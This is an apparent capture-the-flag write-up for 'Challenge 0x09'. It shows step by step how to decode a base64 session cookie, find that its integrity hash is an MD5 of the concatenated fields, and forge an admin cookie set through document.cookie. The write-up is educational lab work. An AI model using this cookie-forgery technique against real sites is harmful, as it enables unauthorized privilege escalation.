# [Challenge 0x09](https://www.youtube.com/watch?v=mCrGlO4FN10)
The sourcecode of this website reveals a hidden form below the comment `This feature should be disabled`.  
It is hidden with a simple style element that you can remove to reveal the form in your browser.  
We see a registration form, so lets register!  
**For the following steps, the username and password you choose will change the variables we get, so keep in mind that yours might be different to mine.**  
I will use `fairu1024` as my username, and `12345` as my password.  
We get an `account registered` confirmation, but we can not log in with our credentials. However, we also got a cookie that we can view with `document.cookie` in our developer console:  

```js
"session=eyJ1c2VybmFtZSI6ICJmYWlydTEwMjQiLCAicGFzc3dvcmQiOiAiMTIzNDUiLCAiaXNBZG1pbiI6IGZhbHNlLCAiaGFzaCI6ICJlMmNhN2JkODU2NDdiM2ZlZTVlZjYxMTMwNDg3N2ViYSJ9"
```

First of all, these cookies are URL encoded, so we wanna run it through a URL decoder.  
There is a good chance that your cookie will not change at all, but that is fine.  

Now the cookie is still base64 encrypted. Upon decrypting it we receive:  

```js
{"username": "fairu1024", "password": "12345", "isAdmin": false, "hash": "e2ca7bd85647b3fee5ef611304877eba"}
```

We could try simply switching the `isAdmin` flag to `true`, but an educated guess tells us that the hash is not there for no reason, and is probably used to check whether the rest of the cookie is legit.  
Cracking this hash is gonna be basically impossible if you dont happen to have used a ***really*** generic username and password combo.  
However, you can just try out different combinations of what you think might make sense with different hash algorithms.  
If we want to use it as a checksum, it would make sense to include the values of the other cookie fields in our hash, so we will try to hash `fairu102412345false` with different algorithms.  
Once we stumble upon the result for the md5 hash, we will notice that it is actually the same hash we have in our cookie: `e2ca7bd85647b3fee5ef611304877eba`.  
So now we know how the hash is created, which means we can make ourselves an admin and craft a hash that confirms our cookies integrity:  
First of all, we will md5 hash `fairu102412345true`, which gives us the hash `2b93ee69db732e68a0bd542a99fd17f8`.  
Now we create a new cookie with a proper hash:  

```js
{"username": "fairu1024", "password": "12345", "isAdmin": true, "hash": "2b93ee69db732e68a0bd542a99fd17f8"}
```

And we base64 encode it to get `eyJ1c2VybmFtZSI6ICJmYWlydTEwMjQiLCAicGFzc3dvcmQiOiAiMTIzNDUiLCAiaXNBZG1pbiI6IHRydWUsICJoYXNoIjogIjJiOTNlZTY5ZGI3MzJlNjhhMGJkNTQyYTk5ZmQxN2Y4In0=`  

Dont forget to URL encode it as well: `eyJ1c2VybmFtZSI6ICJmYWlydTEwMjQiLCAicGFzc3dvcmQiOiAiMTIzNDUiLCAiaXNBZG1pbiI6IHRydWUsICJoYXNoIjogIjJiOTNlZTY5ZGI3MzJlNjhhMGJkNTQyYTk5ZmQxN2Y4In0%3D`  

At last, we set our cookie:  

```js
document.cookie="session=eyJ1c2VybmFtZSI6ICJmYWlydTEwMjQiLCAicGFzc3dvcmQiOiAiMTIzNDUiLCAiaXNBZG1pbiI6IHRydWUsICJoYXNoIjogIjJiOTNlZTY5ZGI3MzJlNjhhMGJkNTQyYTk5ZmQxN2Y4In0%3D"
```

After reloading the page, the flag displays below the form.
